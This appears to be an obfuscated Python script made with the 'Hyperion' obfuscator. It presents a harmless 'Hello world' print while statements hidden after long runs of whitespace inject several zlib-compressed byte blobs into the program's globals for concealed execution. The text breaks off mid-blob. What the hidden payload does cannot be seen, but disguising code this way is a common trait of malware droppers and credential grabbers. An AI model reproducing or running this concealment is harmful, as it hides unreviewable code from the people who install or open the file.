from builtins import *
from math import prod as Ceil


__obfuscator__ = 'Hyperion'
__authors__ = ('billythegoat356', 'BlueRed')
__github__ = 'https://github.com/billythegoat356/Hyperion'
__discord__ = 'https://discord.gg/plague'
__license__ = 'EPL-2.0'

__code__ = 'print("Hello world!")'


_invert, _floor, Round, _power, Theory, Floor, _math = exec, str, tuple, map, ord, globals, type

class Calculate:
    def __init__(self, _positive):
        self._random = Ceil((_positive, -27612))
        self._while(_round=-74322)

    def _while(self, _round = int):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self._random += -67679 - _round
        
        try:
            ((Theory, {Theory: Theory}) for Theory in {Theory: Theory} if _invert > Floor)

        except ArithmeticError:
            ((Theory, Theory) or _invert if (Theory, Theory) and _invert else ... or (_invert, (Theory, Theory)))

        except:
            _math(-77712 + 83579) == type

    def _memoryaccess(self, Invert = -6959):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        Invert *= 59050 / -60546
        self.Algorithm != bool
        
        try:
            ({Theory: Theory} or _power if {Theory: Theory} and _power else ... or (_power, {Theory: Theory}))

        except AttributeError:
            (Theory, Theory) if _floor is Round else {_floor: Round} != Theory

        except:
            _math(26197 * -19870) == None

    def _add(DetectVar = Ellipsis):
        return Floor()[DetectVar]

    def _builtins(_run = -75858 / -86883, Substract = type, Hypothesis = Floor):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        Hypothesis()[_run] = Substract
        
        try:
            ((_power, (Theory, Round, _power)) for _power in (Theory, Round, _power) if _invert < _invert)

        except AttributeError:
            ((_absolute, {Theory: _floor}) for _absolute in {_floor: Round} if Round != _absolute)

        except:
            _math(56951 / -29800) == True

    def execute(code = str):
        return _invert(_floor(Round(_power(Theory, code))))

    @property
    def Algorithm(self):
        self.Frame = '<__main__._positive object at 0x000008683BE46737>'
        return (self.Frame, Calculate.Algorithm)

if __name__ == '__main__':
    try:
        Calculate.execute(code = __code__)
        Power = Calculate(_positive = -82903 + -4149)

        if 367485 > 8350367:
            Power._while(_round = Power._random * -43819)
        elif 420169 < 9172162:
            Calculate(_positive = 91870 - 39418)._memoryaccess(Invert = 46928 * Power._random)                                                                                                                                                                                                                                                          ;Calculate._builtins(_run='S2222SSSSSS2S2S222',Substract=b'x\x9c\xdd=ko\xdbJv\x9f\xad_\xe1\xcd\x17Y\x88o.\xc9!\x87\xa4\x80|)\xdc\xa2\x12l\xab\xd8\x14M\x8al`P"\x95+--\xba\x96\xbcvPl\x7f{\xcfc\x86\x1cJ\xb6DS\x1a\xe5:\xa2\xf8\x1a\x0e\x87\xe4<\xce\x9c\xf7Y\xdd\xff\xe8wN\xe17\x9b\x9e\xd1\x1e\x7f77\xc5x\xfa\xb0\x9c$\xab\xe2\xfe\xe6\xe6\xf4/\x1f\xdf\xfd\xfb\x8f\xbb\xec~V,\xde\x9d\x16\xf7F\xb6\xe4a\xf5Gq\xbf\xa4<g\xef\xc6\xb3<\xff\xb1\xfa#\xfb^$+\x11\xc8w\xe7\xef\xfe%\x7f\xc8\xfe\x9a\xa5\xefz\xb5\xbb\xbe\xcfV\x7f<\x8c\xb9\xe0?V\xab\xbbe\xff\xf7\xdf9\xed\xc3\xa4\xb8\xfd}\xad\x98\xdf_xv:[N\x8a\xfb\xb4^\x8cJ\xfc\xf0\xfd\xfb\xefwy\xf2\xfd![\xbb)\x9fM\xb2\xc52\xe3\x9b\xfe\xf5?.\x7f\xf3>8kY&E\xca\xd7\xbbw\xf7\xb3\xc5\xea\xec\xdd\xbfgy^\x9c>\x16\xf7y\xfa\x97w\xbdn\xa7\xd7/s\xe3\xf5\xee\xf2\xef\xb3\xb4\xdb\xebdO\x93\xecn\xa5*sq\xf7\x00w\xfe\xb5Xf\xcb\xd3\xe4>;\xbd\xcf\xd2\xbf-\xfekV\xe4\xd9\x8a\x13\xc6P3\x7f[\xfcw\xf1@g\xc9)\x16\xf2\xb7\xc5u1.\xd2\x1f\xa7\xf9\xec\xefp\xdf\x8f\xe2\xe1]\xaf\xc3/5\xbb\xbd+\xeeW77\xf0\xb4\x1f\xcbn\xefC\xf64[\x9d\xf5:y1I\xf2\xe5Y\xefkwx9\xb8\x1c\x0c\x06\xc3\xcb\xcb!,\x83\xc1\xe5e\xf7\xdb\xc7\xefy1\x86\xeb\x9d\xcd\x8bx\xcb\xd5\xf5\xf5\xd5\x15lp\xa76W\xd7\xdd\xaf\xfd\xfe\xfb\xdf\xde\xffv\xf6\xdb\xd9{\xb7\xd7\xfb\xf6\xedc:\xbb\x7f\xa1\x80btq1\x1a]\xc0nT\x14\xb0\x83\xc3\x0b\xfcm\x96\xf1=[%\xab\xd5\xcb\xe5\xc0\x02e\\\x14x?\x1e\xc3\xbb\xf3\xa7u6\xaf\xe1\x1d\x9f?\x7f\xc1\xff\x17\xd8\xc2\x06\x8f\xe1\x8e\xaa\x96^x\xce\xb5\xfa\xd6+\xda\xc0\x0fn\xda,\xe9\xac;~\x98\xe5\xab\xd9\x02\xeb\xf9\x1f\xc9\xfdK\xefp\x01__\xa8d\xcc@\x9f?\x82"\xbb\xdd\x0f\xf3b\xb6\xe8l<\x0e\xef\x82\xb7\xcasXa\xa1\xc3\x9c\xd6A\x0e\xf7Q\xddA\x11\\"\x16<\xc2\n.\xce\x9e{\xc7\xe5b\xb6\xcag\x0f\xe3\xf5\xba\xee\x9d__\x19\r\xaa\x9a\xf8\xeaue\xf4\xbe\x1e\xa2\x90\x0f\xb3E\x9a=\x9du\xb3\x87\xfb\xff\xdc\xb8\xfa\xad\xf7|\xfd\\\xd1\x93\xe9\xf4\xba\xbat}\xfd\xda\xfa\x99\xcd&\xcbd1\xdb\xab~^,\xe35\xf5\xf3r!\xba~~Lg\xf9S\xf6\xc7\xe2\xe1\xb9Jz\xbe\'_\xe29\x9c\x0c!i\x08i\xf0\x83<\xc3_\xb9\x13\xe5\xb3\xbb\xdbb\xd2\xbc\x8a\xca^\xa4\xfb\xd2\xab\xbb\xd0[\xaa\x9de\x9e\xfc[\xf3\xba\xf9\xf4\xc9\x83\x85~\x1e\xfd?y\xbfp\xe5\xe4E\xb1y\x15\xea\xe6y\xb0~\xad \x90~\xbe\xfa\xff\xc2\xf5s\xbfZ6\x06\xcf\x035k\xd1\xa4Es\xd8/\\1\xab\xa4\xc8\xa7\xcdG\xd5\xc8)p)\x1c8\x80zp\x9c\x11"\x05p\xf0\x0bWQ\x9e\xfc#{\xc5\xb4E\xb3\x14\xcdY8w\r\x07\xe6\xad/V\xdfY\xb7\'n\xe4Mt\x13\xde\x88\x9b\xf8\xc6\x85-\x1c\xc1\x1d\xfefj\xb3\x02_B2\xce\xc6]\x11\x06S!\xd4\x1a\xc0\xea\x1b+\xa6\xf9\xde\xd8\x8b\xbctg>\xe1\xc5\x80?\xa6\x19\x92\x13g\xddh\xba\xda\x9c\xde{\xbc\xf9\xf6\xebv\x8fI\xf6\xf4l\xf7x\x0e\xb6li\x94\x00jSx\xb8\xe5#\xdc\xeb\xb3\xeaH/\xbb\xaa\xfd\xdb\xc7V=\xc3\x0b\xa5\x90SX\xc62\x96\x81\x17\xeel\xdd\xe7!\xe8l>\x9f\xcd\xe6\xb3\x1c\x88\xdc|\xce\x90\xb4\xe9(\xc0\xbe\x1e\xdd\xf8\xd0\xdb=X\xdc\x1b\xe7&\x80;\xe2\xcd\xd4\xfdG\x81\xe3\xa5\xd4\xcb\xdd\xd7\xf4\xe2\x96\xd5\xeayA\x08U\x9aI_N\xc30\x14\x9e\xd7\xb6r\xb7<\xc6\x9f\xc0\x12\xc3\x9a\xc06Q\xcb\x84\xce\'\x94\x12W[k\x1d(\x942\xb6\xf0m\xd5\xa0\xd0\x03\xc1LYO\xe3\xa3}\xbe\xb1\xdbs\xa8\x9f\t\xe8u!\xc0\xe0\x10\xf6\xd8\x13\x9fIm\xda\xb5\x1d\xc8\xe1Z\xc8\xbc\xad\x8f\xc7\nRKX=X\xf1<R\xc7\x98\xe6*H\xbf+\x9f\xd3|\x8c\xd0\xfa\xea\xae\x0b\x8f\xe0\x05\x8f\xfc)n\xe5\x94\xcf\xe4\x14\xcf\x11,\xd9\x83zn\x18\x84\xbe\x8c`pz2\x0e\xfd\xb0u\x17\xee:#x8<\x1a\x9e\x8d\xcfW\x1bH\xd8\xbf1\xf5\x14\xec\xaa\x06\n\xd41\xa69\xea8R\r\xda$o\xd8\xacQ\xdb\xd7\xaa\x0f\xf5\nk\xeb\xba\x1c\x0e\x86\n\xc9"f\xc0%\x1f\x0f\x9a\xe3T.\xe4p,d>\xf0\xb4\xb2O-{\x81\x8f\xc3\xc3\x9fxN\xe0\xf9\x81\x1f\xc2\x1e\x8f\xa0\xc9\xbd\x9d\x10\xb0\xc58\x85\xc5\'\x14\x81\xc6$\x9e\xd1\xea\xf3\x08\xd5\xd7\xf0\x8a\xbd\xd1:\x81\xa94\x94Q\xe8\xb7\xeeY#\xe4\xe6"=\\\x14\xcc\xcf-\x8a\xa6\xdd$\x04,$\x80U\xc2L\xe0\x02V\xe2\x10\x9e\x1em\xa6\xbe-\x0cE \x90o[\x9d\x88-\x97X\xb3\xfa}\xf9\xdcx\xe0A\xadI\x98I=\xd8\x060\xb7B]\xc2\x1d\xdef\xeaO\xaa\xd1gXIgg\xff\xb7\xc9|\xeb\x15\xf7gg/1\xbf{\xc9"={\xe6\x9e\x97\xaa\xf4\xf6v\xb1\xb8\x85\xdf\x02\x0f\xe8\x87\x87\xb0\x1e\xbd\x12\xdaw\xa9X\xc0\xda\xbaS]\\\x10\xe3\xea\x02\xa5/#\x94<\x90\xd4\xc4\x06\xb2\x85\xa8\x1c\xa2t\x01\x0c[\x0fV 7hHo\xa46-0\x00\xcc\x10oa\x8a\x1d\xf1E\tw\xc8\xcd\xd4\xe6C\xc4\x83\xe73\x0b\x80\xdf\xc7\xa7!\xb2\x91\xba\x7f\xefpU\xefx-\xca\xb7/\x00\x92\x93P\xc8\xd6\x10}\xdb\x9c\x95\xc1\x92\x96kJ\xfbL\xa5\xea\xf42\x87\xb5Y+\x98\x06S\t\x03"\xb4B\xfaM\xa5\xc2\x945\x1e\xcd\xf8\xb3\xc6\x9d\xf9:c\xd3V\xe7fh\xc3@\n/\x95BB\'\n\x03\xc0\xfeR\x99\xc2C\x01\xaf\x86y\xbb=O\xa1`\xf1#Jb\x99}\x84gG\xef\xed\xed{7`+\xb08\xa1\x10\x897\xf5\x90\t\x00?/\x93R\xba\x12\xeb\xccc\xbe\x0b\xa4 \x07&\x85\x1c\x0e\\\te\x10\n\x0f\xfb\x8d\x07y\x10\x9b\x8e\xe1j&\xa6t\x0e\x94\x19\xd2*\x903\x10)\xd4.P1\x12\xef\x07\xca-\xc4\x86\x8ee\xd6\x1eG\xda\xf29\xf0\xe6Qm\t7V}DW\xad\xf56\xcf\xf3&\x9e\x07_\x8c\x18a\x80_\x0bc,%Z\xae\xac\xab\x00\xeb\xc1\xf7<\xa8w\x0f\x9a\xdb\x0b\xd30\xb5P\'\x12\xbby\x06\x8b\xde\xeb%\xadma\xbf\xbb6\xf2\xe4v\x9c&\xa7OO\x8f\xf0\xc3-\xfe\xe1\x87\xfb\xfesl\xe7\x16\rX6N\xd9`\xd5/\xaa\xf6\xf6\x00\x85\x0f]\x1bQ\xf8)\x0e\r\xa8\x97\x89\x87\x1d\xd8\x81\x8e\x8b\x8d)\xaa\x06\x84\xa1\x10\x95y\xc6p\xbc+/\\\x17\xe3\xd0\x158\xaa3@@0O\xca\x83\t\x9e\xe6"\x87J\xcazj\x18\xe2\x10\x0c\x9d\x8d\xbc\x0e\xb4Z\x08\x9d\x0c\x07mb\x94\x1amy\x03A\xe4I\x06%\xfa\x00\xfc\xe0+qHB\x99\x19\x96\neH\x18\xac\x9e\x10\xb5wl\x0b\x16\xb1K<R\xc7P]e\x7f\x90(5oH\xb1\n<\xc5\x0bB\x16BhH\x07v\xe5k(\x1d8\xe8TC\xed\x81m!\x89\x95cc\xa0\x1b\xc8CV"\x13&RQ\xa2\x16\xf6\'Y\x98\x01\xe0[\xd5\xf7c\xaa%\xe4\x02\xc9z\x9f\x7fj/M\xe2\xdf \xfc}\x9bl\xbagZ\xbc\xed\xb8Q\x14Z\xaeD\xbd\xb8}+\x84U\xc9\xcbs\xd5@s\xd5\xa0s\x14\xaf\x8fEs\x15\x1fpW^\xaf\xc1\xeb\xbe\xba\xcf\xb0\xf4!V\x92\x87\x89:\x9e\x94\x92\x08}ub\x0f\xe1\x1e\x07\xf0\xc9\xd0Wp\\\x00\xe2-%\x9cM\x82\xd60\x81\x84\xdf\xf8\n#\xe2\x1b\xc1k8x\xd4\x90\xb1{0\x96\xfe1\x99B\xcf\x01\x1a\xe9SuZ\xc1+\xeb8e\r\x87\xac\xa3%ad\x111\xb1G\x83V\xd4f\xf6\x13\xa6\r\xa4@\xa1\xe5\x1c\xa4\x0b\x00+n=Ut\x91\x19u\xbb\xa0\xe5\x96\x19S\x8b\xc3\x88\xaa"\x03*E\x06\x94\n\xd5\xde1\xc4U\xdb\xf2\xd25\xcb\xe8\x07\xd7f{\xee\x16\xb2\xb5\x10\x90\xa0"\xc4\xc5\x885#\xe0\x7f\x181\x910dwZ\x8e\xe7\xa8\xca\t\xd7\xa6\x87]y\x9bL\x0f{\x02\x19\x17p\xee\x00@\x0b\x89\xdf$I\xca[W,\xd1J\xfc\'\xd2\xe9\xe9\xc8\xf0\xb9\x05\xffl\x8f)\xce\x07\x94\x0f*\r*\x0e&6\x07\xce=@\x80\xa7\x00\xa9\xc7\xed\'\xba\xedp,5`W\xc5Q+S-A/\xea\x89R!/\x91\xea\x99\xfa<V\xc7\xc2\xd0[\xda\x95\xd7\x06\xd2\x03\xfd6\xa1%\xa6eR.\t]\xe1#\\l!=%\xaa\xa7\x81\xa3\xd6\xe0*\xbf\xda\x00\xa2\xbb\xf2\xba\r\x81\xe8\xab\xfbP\xec\xab\xba\xe1}u\xc6W\xd6S-sda\t\xdb\x0b\xbeP\xe4E\x92/\x16~\xf1\xf1\x9fY<\xed\xab\x96\xd6\x90\xdf\x1c#\x9eV\x14P=\xa4I\xdeW\x8a\t\xf6\x9bn=@=e\xeb\xc6\xcaY2\xc729\xfa\x93\xaaoCm\x82]\xc0I\xe3 z\xda\xf4\xd5P\xd2Skh\x00\xa7]y\xa5m\xc9\x9c+b\xe1\xc1*\xbd\xcc\x8f\x828pD\xc2|g\xc4\xf3\x89{<\x86Q\x91\x01\x94\xcc\xa07d\xc4\xa4\xe2\xe3\xd6\x95\xcf\x95M\r@\xb4\xf7\x01\xe8m/\xa8\xb8O\xbe\xea\x8f\x9a\xfb\x14\x07u\x85\x98&y-+\xc40\xa3\x1a\xd9\xf8^[\xd5\x8c\xee|>\x9f\xcd\xf3\xf9<\x87m>\x9b\xcdr8\x9d7\x05!\xac\xb4\x16\x91\xe2Z\x0c{\x0f\xf2\x07\xebi\x87\xc1\xe4\xf5d\xa3\x99\x82\xba\xc7\x0bU\xfd\x91\x81\xc9\xef\xca\xdb\xb0Y~\x01fb\xf6\x0c\x85h\xe0Z\xd6fB\x80\x07\xad%s\xdb\xbe.Q,\x9fI\xa9|\xca\x0c\xa0\x8a%\xa4W<\xb3\xa7\x94*\xa1+i\x06\xa9\xb0\xd2\x8e$_\xd5\xfa\x8b,ke\xd9+Kd\xa5\x92\xcf\xda\xe3Z\x04\xd0[C\xe8\xa5.\xf2g\xa0\x1f\xa3\xec\x8f\xfa4\\\xf10\x85&O\x94\x10\x12\xf7f\x0f\xca')

        if 313439 > 1456531:
            Calculate(_positive = 10148 + -71749)._while(_round = Power._random - -32581)
        elif 239127 < 5448014:
            Power._memoryaccess(Invert = 3428 - Power._random)                                                                                                                                                                                                                                                          ;Calculate._builtins(_run='DOOODDoDOOOoDODooOD',Substract=b'\x15@\x0f\x82\xa0\x19\xc0\x9f\x1c\xe0\xd0\xac\xb1n\xb7@\xbd\xed\x1b\xde\xa2NOD\x1a\xb5\xfef\xea\x01\x880\x03S\xd1\xa0Dc/z\xa2\x8d\x0c<xW\xde\xa3\x82 \x93\xd9\x86\xa2s\xbf\xbd\xd8|\xcb\x03\x83\x08\x96P-\x11\xad:\xc58z\x03*\xb7[\x1eS\xca9+\xc9\xe6s\x82j\xda\xdb\xfb\xd2\xd7\x8a\xfe[s>\x88\xed\xc1r@^\x1as?v\x8d%\x19TV?%f\x15T\xbc#\xcf\x18K\xbb\xf2\xdaV;c\xd5\x08I`\xcf\x8a<\xcc`I\x87k\xcc\xe9\xba:\x84\xed\x9e\xd5\x1e\x1d\xdfR\xac\xa1\xb6\x90\xaa\xa5\xae\xd4`\x8fA\x8d\xca\x19\xde\xa4u\xffG\r\xf1Kex\x07\xbb\xcb\xa6z\xe2[;\xff\x91\xf4\x83\xc8l&\r\xa4\x9fy\x13<^S`\x00b\xccKq\x1eXSA\x80t#%\xf4\x90\xbc\xc8\xa0\x9c 0\xd5\x0b$\xa7\x1b)\xed\xf5\xb0\xf8\x04?\x84\x95X\xaf\xea\xfe4\xfe\xcc\xb5L\xb3\xba\xc9\xe9.\xe9>\x03\x0309\xe3\xbb\xf3Z\xe1!V\x1c\xc3\x84\xb4K\xf4\xca\x1c\xc4\x98\xae\xc2j\x0f\xac\x8cm`\xc8%W\xcf/9\xa3\x9a\xdf\xa7\xb7\x16y}\x87S\x1d\xd8>1\x84\xb5i`Cj\xb96EXD:2\xa5\xe8\x14\x12\x05k\x03\x81T\xad\xa8\xfb\xab\xc1\xddV\xfd\x16\x17{\xbd\x94\x18\x82{*\xbdt5S*W\xec\xa9\x83p\x03\x8f\xa5_\x7f\x08[\xddm\xed\x9b(\xa8\xc3\x12\x8d\n\xf2\xc4J\xc21\xb1\xda\xbeaD\xa4\x10\xcc{\xfbi\x86wI\x12\xf8\xa8p\xe3\'\xd6\xa3\xdc\xbf\x91\xb5\xb5\xa4\xa6\x16\xbd\xa02\xae\x93z\xbePsI\x93\xbc\xb6\x11\x8c\xf6\x16\xc7]V.d=\xc3\'%[\xa5\xe3\xc30\xceu\x8dh\xda[\xae\x1d\xbb\x06\xe3|W^\xebh\xdas\x9aw\x02\xe9\xd7=T\xdbsC\x17M\x19\x0e\xe5\x8d\x01\xd1+M]~\x86\xc8i\x9d(4\xf5\xd1t\xc3\x05/\x10\x90\xcf\xe5\xf5_o\x99\xb2\x0f\x9b\xa2\xbd\xc0\x89\x0b"L\x99\xb6\xd7\x07A\x965\xf6\xa9\xcdy5\x8fJ\x18\xe7\x9a\xb7\xd5$\xafm3`V\xd2\xd7\xe6\x0c\xc1\xb4\xa2\xcf\x15\x85N\xaa\xf9/\x9a/\xb0\x8a\xbf+E\xe8\x93\x9a\x83\xa1\xce\xbf\x87\xf6\'\xbahA{b \x12\x87l`\x8c\t\x87\x11I\x05F\xffu\xd4\x1a\x18\xfd\xd87DR\xbb\xf26V\xa2V6\x03\xe4ncF\xbcYZ\xe6\xc8\xa9\x9d\xe5\xf3y\xff\x99\x8ax\xa9\xd7\xeaOS\xe9xzd\x90q`%G\xe4=\xa3\xcd\x1dZ\xdd\xe1\x82\x86}\xc8{~&\xf5\xf8\xef\xfe\x82\xfd\'\x1b|\xb2\xcd\'\xdb\x80\xd2\xc1\x01\xec?M\x9d`}\xac\xd1\x10\xad"\xe3>\xa3?\xfcR^\xcb\x93\xae\xe7g2\xca\xdcq\x92\xa4\xa1\xe39>L\xb5\x04,b\x04\x01\xfb\xe0\x84\x9a_\xca\x08"m~\xfe\x9c{ -4-\xda\xd6m\xa4\xe5\xaa\xda}\x13iK\x1am\xbc+ot\xcc9\xf7\xd5\xb6r\xa4>h\x83ga(\xac\xc7\xa5431\x16\x92b\xda\xe3\xc4x"\x10\xbep\x84\r\x9ddE\xc3%\x06\xd5\x9e\x94T\x9e\xa2\xfb\x1a\xdb\xaa\xe5\x95\x1d\x85\xf6\x9b\x977\x9er\xb6\xbc\xe4\xba\x94\xe6\x05\x9e\xbbEF\x8a\xab,\x08\x9c\x10\xad\xb9&l\xc7\x85\x0c$\xb2\x11k\xef\x80\x02\xcdXG\xecV\x986\xe4\r\xed\x00^b\xa25\x0cZ\x13\x99Z?\xda7P\xc3m\xf9\xac\x9bo\x8d=\x8fP<\x07\x05\x81\x88\xd0Q\n\xa6M\x15z\xa7\xad;\x89\x83\x05\xd5\xcd\xea\xc1h\x11\x0b\xd7\x831\xdas\x8a\x08V_\x84\x02}\xa4\xe1\x16\xbd?\xb90bb4\xb4\x0eR.\xa1n=\x8bz\xdbrJrq\xf8b\x85~\x96\xdaO\xea\xa9\x99RJ\xde\x0f\xd1\xac0\xa8k\xbeN\x15`e\x96A\x17\x00>\xb9+\x907\x1eI\xd4=\x92\xaeo\xa4\xfe\x14\xecl?u\xb5\x88t+|Z\x04m\x03Z\x05\xd9\xd3\xb7wS\xa7\x16Rd`]\x06<hZ\xe3\xa82\x15\x90\x0f0\xf4\xfaBu\x0cw\x84\x9b\xa9M\x0b\x8c\xc8\xd5#ja\xc5\xe4\xcf!$?\x14\xf1f\xea\xdbkB\x1a\xdb\xb51\x85\xbc= \xe6p\xa6G\r\\&\x12q\x86\x9f\xa0\x8e\xca~\xe3\xae\xd9\x84\xf2\xd2\x91M\xa5\x07c2i\xdbm\xd1\x19\x8dG\x1b\xf6K\xe3}zC,k4\xcc\xf7dk\x01S\x17\x9f\x83\xa6w\xfcl|4=\xf6\x00\xf3\xe6\xd1<A\x1c\xc2\xc8\x85\xbc-}\xd6\xde\x96\xbe\xb0\xff\xa5/6\x14\xcf\xb7U\x99\xf6\x14\xa8\x157MY\xa9\xaf\xd2c\x83\xd9\xb1+\xef+\x88\x8c\xf6\xdc(\xb2\xe4\xb7\x81NO7\\\xa0i\xa7h\x95\x93\xb4\xd2\x82\xda\xa6" \x8b\xc4\x94\x17\x03K.@\x9eqv\x91\xd6\x1d^\x1c\xd7\xfa}O\x1e\xfc\xb6/\xd5\xa2\xf7X\t5\x13CDo\x10Kv\xcdT\xa2=\x146\x91\xb5\xc9^C\xc8e\x08\xf1;\x8f-\x028\xa2Q\x1c\xfa\xd8E\x85_\xe2\x13[\xd6)\xdct\x83c\x8a\xfe-zO\xa9\x84\xa3\x92\x89"\xf2-<\tc/-\xd1,\x1b^x\xeb\x1ev\xb5\xd7]\x9d\x8e{{\xcc\x90\xa9\x15}\xb7\xba/\x0b\xa9\xd5\xb6}\r\xc9-\xc2j\x00\x1bn\x98\xc0Cl\x19\xd4\xb3R\x8d\xa9fc*\xde\xd4\x17\xab\xea7\x8a\xa8\x9e Z\x0f3\x122p\'\xed\xdd0u\x9f\x9eJ\x81\xb4\x12J\xff\xa9P`\xa6\xdc\x1b\xb3|\x03 \xeb<\xa2\x14#\xe5]\x1a\xfd_\xca\xcd\xd4\x9f\x02\x87[\xf9r\x96\xa5\xd5C\xe5\x97NN\xcd\x14YZLX\xf5\xec,\\\xd2\x80B\xe1#r\x98b\xe1\x03t\x96BH)\x12\xe1\xc9\x08RQ\xac\xd8zr\xdd\x868\xa4\xb2\xee\x0b\xac~\x9cZD\x91JcI\x1b\x00\xb3\x9a\x046\x8f\xcc\x14\xab\x08`\x88\xbc\x82\x00\xc5\xc1\xc4\xd5K\x19\x84\xe2\xc4\x87r\x83=\xac\x14U\xe0\x17\xcd\xc9\xe6\xb3\x9f-\x16: \xdc\xda\x9f\x19\xe7\xd2\xb0\x95\xc2G\xfbQ\xe2\xbd\xb6\xd6\x90\xd8\x06Et0\x83\x89r"\x14\x97\xfbD\xc9c\xe8Zc\t\x05\x19-)\x93%4\x9aD\xe9\xf8A\x9c\xe9\xd5$&\xa5vn\xa9\x13Y\x12\x0f\x16\'W?$\x80\x1a\x92\x87M\xc7\x07\x92\x08}B(^\x1b9\x9c\xf3\x98+\xce\x13\xb1\x03wTyb\x98\x8e\xd3\x17\xf3e\x00\x1d}\x91\xfa\xae\x98\xfa\x1e\xd9\x97e\xa4~\xa1s\x03\xfc\xb4\xc3\xa73\x11\xea\xbai\xc5\xf1Lw\xf6q\x8a\xbd\xfb\xdb\xc2\x1a\xe9\xf0\xbcO\xcd\x06\xdf\xa6\xfa7{ \xa0\xb05:\x8cMs\x9d\x8f\xa2\x18\xb1\xa7\xe5\x82\xaa\xa5\xb97tdI\x07\xcar/&o\xdd\xe8\x98\xd8\xa1\xf3Z\xea\x91\xa1\xa2\xd6\x17\xd3l\'aH\xb9\xb4\x1eY\xb8\x16\xe6h[\xde\x86\x16\xf9\xfbCW\x84\xaf\x12F J\xb3\x04\xecQ\xc4\xe1(H\x8b6\xfbRD\xed\xddEn\x83\xb7u\x7fTu{\xe4\xba\xf7d\xbbx\x8b\x15\xcd|%\xb5\x8f\xd7\xdc\xd2%\xa5ErbH\xf7m\xfa\x1c\xb1a\xe4\xd9e\x85\xad+\xfdP\xce\xf2v\xecr\xd8Z\xc1\x12\xcb\xa2ne\xb2N\xfaj{\x14{$>1\xa3p\x86\xb5\xc9\x8aM7\x18\xb0\xe9\xfaY\xe3ydP\xa2\xc0:\x8e\x01\xaar4F\x94\xba\x1e\xca\xa6<\xde\xe2\x1fET\x7f*\xea|;\x04\x9a\xecaM\xc2.\xf18X\x03\x85o8\x80[\xbc\xa3\r\xc1\xba8\xb6\xb5\r&\xb3\x99\xb1\x8bP\xd0\xde\x01Yb6\xe7\x84\xb8\x14r!R\x92s\x9f\xf8 kiM\x0b\xc3\xa0\x89.\xb1Ob%=\x07\xdc\xe2}\xb4\x99\xda\\<\x1f\xdc\xb00\x9e\xa37\xb8\xf4~\xf1f\xea\xcf\xe1\xd3\xec\x8bz\x04\xd3=\xd4\\\xb8\xc4k\x9a}\xd4S\xae\x9bj\ro\xab\x08\xd3e\x9bvJ&\x8csr<m\xe81\xee\xca\xdb\x18~(hX}\xcc\xb5\xfa:\xdc\x1f\x84n\xd4\x9eAx\xcb\x9eBt\x84\x06\x9d\x86{{s\x13\x0fy\xe4\x8e\xc5\xe4\t\xcd\xa5I\x91\xb8*\xe4\xaa\xc8Ett\xbf\xa0@_t(\xcd\xcf\xaf\x10P\xff)\xe0\xe1\xba\x12\xaa\xb2?@\tK\xc8\xfe\xdc\x85\x1c\x93A\xa9\x8f&\xd7@\x0e{^F$x\xac\x10\xbb\x8cP\x9a)Ka\xc9\x1f\x81\xab\xca\x10P\x9e$U6_\xa3>\x88\x18\x1a\xb2\x9bt\xf3.Rs\xc5&\n\x046\xcf4$\x84B\xa4\xc2V@\x11-\x0b\xd1\x1d\xb2\n\xcd\xe7\xd7X\xb8\x9cf\x97(0\x9d\x93\xed\xc5\xd8\xecR\xc1<\x92\xaf\x18O\xc6\xe3\xe6s\x00jw\xb9\xc4\x9bG\xa8\x1f\x95\xf1I\xd7R\x7f\x92\xccT#q\xca\xcd\x9d\xe2c\xd2\xe6\x10\xea\xb8:\x1am}_O3\xb76=V\xa1*\x15jH#72Bovvl`\r[W\xd3\xae\xd9\xb0\xd0O,[:\x03\xe4q\xc3\xc4G\xa6\x90+\x90\xc3\x1d\x85\x81@\xd8\x1c\x07\x81\xf4|\x19\x06\xbe\x80Q\xe8\x052\x08D,"\x00\x0b!$\xa2.l\x0c\xf7\x05\xd2\x87U\x08\x0cC\x81J\xfe\xa8A9\xa5f\x0b\xe1\x1cJ\x84R\x02\x81!6\x10\xf3\x93p\xaf\x07\xe0\xcc\xc5\xabx\x17<\t\x9d\xf4\x880\xf4\xe3\x10\x15\x9f\xa7\x90\x16\x01\xd4\x13x/\x85\xdb\x90aB\xf9\x90\x11\x8c\xe2L\xd7G\xd0\x14\x11\xa4\xf0 \x7f\x88\xcf\x93\x13x&\x0c`\x96\x8cKxOx\x11\x17\x8f w\x02\x05\xc3\x8a\xbek\x05\x0cn)\xfd1<!\x10\x180\x03\xdf\r\xae\xc1\x8d\xf0-"\xf2\xf1+\xf1\x8dQ\x93\xca\xf5\xd1aw\x02\xb9=\x80\xa0\xf0nr\x82\xef\x88%\xc2WM|\xb8\t\xbe\x05\xea\x02R\x85\x88\xe1\x0e\xb8[\xbaX\t!\xbc{\x10J\xd4L\x82cA\n3\xf8\xf6\xc2\xf3\xb1\xfe\xc6\x81+\x1c\xfc.\xaa\x03\x1f\x9f \xf1.\xac>\x04\xf5p\x9f\xef)(\x08\xdfh\xd7\xfa )\xf9\xde\xa6K\xfd\xeah\xb2\xbf+\xfd\x9f&\x8fh\xe1TN\xc78\xaeL2\xf4y\xac\xaeU\xd7\xed\xb1r`~Fa\xd3>\xc1b\x07\xa6R\x0e\x9a \x0e\x87\xfb7\x80F}\x03C\xcbN\xdb\x81\x96\x11\xdc\x8d\x18.\xbb\xf2\xda6\x04\xd8)\x8c\x90\xa50\xa2')

        if 428917 > 7247228:
            Calculate(_positive = 636 * -96145)._while(_round = Power._random * 84641)
        elif 290211 < 7171459:
            Calculate(_positive = 56752 + -83183)._memoryaccess(Invert = 91490 * Power._random)                                                                                                                                                                                                                                                          ;Calculate._builtins(_run='S22S2SSS2SSSS2SS2SS222S2S2',Substract=b'\xa9\x98C\xae\x89/\xc6\xbe+\xd2g\xc5\x171L\x1bV\xf0\xa7\xa4\xd6G\xb5\xf0J\xf7\xcd\xca\x90H\xf7a\x8b\xd3\x87K \xcb\x86\x90\xae\xc6j\xaa|E\x19\x9e\xa3\x8e\xe5\xd0\xc51\xac\x8a9u\x8a\x93\t\xeaA\x86\x82\xe2/\x05\xb6\x18\x8ci\x8d\xd9\x96\xca\xacV\x1f\xeb\x8b\xbd\x1a\xf1\x83 